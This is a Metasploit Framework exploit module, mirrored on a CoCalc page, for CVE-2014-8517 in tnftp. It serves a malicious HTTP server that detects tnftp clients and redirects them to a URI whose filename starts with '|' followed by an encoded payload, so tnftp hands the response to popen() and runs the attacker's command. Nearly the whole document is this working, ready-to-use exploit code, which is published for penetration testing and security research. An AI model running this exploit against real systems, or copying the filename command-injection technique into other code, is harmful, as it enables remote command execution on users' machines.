CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/tnftp_savefile.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer

10
  include Msf::Auxiliary::Report

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name' => 'tnftp "savefile" Arbitrary Command Execution',

15
      'Description' => %q{

16
        This module exploits an arbitrary command execution vulnerability in

17
        tnftp's handling of the resolved output filename - called "savefile" in

18
        the source - from a requested resource.

19


20
        If tnftp is executed without the -o command-line option, it will resolve

21
        the output filename from the last component of the requested resource.

22


23
        If the output filename begins with a "|" character, tnftp will pass the

24
        fetched resource's output to the command directly following the "|"

25
        character through the use of the popen() function.

26
      },

27
      'Author' => [

28
        'Jared McNeill', # Vulnerability discovery

29
        'wvu' # Metasploit module

30
      ],

31
      'References' => [

32
        ['CVE', '2014-8517'],

33
        ['URL', 'https://seclists.org/oss-sec/2014/q4/459']

34
      ],

35
      'DisclosureDate' => '2014-10-28',

36
      'License' => MSF_LICENSE,

37
      'Platform' => 'unix',

38
      'Arch' => ARCH_CMD,

39
      'Privileged' => false,

40
      'Payload' => {'BadChars' => '/'},

41
      'Targets' => [['ftp(1)', {}]],

42
      'DefaultTarget' => 0

43
    ))

44
  end

45


46
  def on_request_uri(cli, request)

47
    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/

48
      print_status("#{request['User-Agent']} connected")

49
      send_not_found(cli)

50
      return

51
    end

52


53
    if request.uri.ends_with?(sploit)

54
      send_response(cli, '')

55
      print_good("Executing `#{payload.encoded}'!")

56
      report_vuln(

57
        :host => cli.peerhost,

58
        :name => self.name,

59
        :refs => self.references,

60
        :info => request['User-Agent']

61
      )

62
    else

63
      print_status("#{request['User-Agent']} connected")

64
      print_status('Redirecting to exploit...')

65
      send_redirect(cli, sploit_uri)

66
    end

67
  end

68


69
  def sploit_uri

70
    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +

71
      Rex::Text.uri_encode(sploit, 'hex-all')

72
  end

73


74
  def sploit

75
    "|#{payload.encoded}"

76
  end

77
end

78


79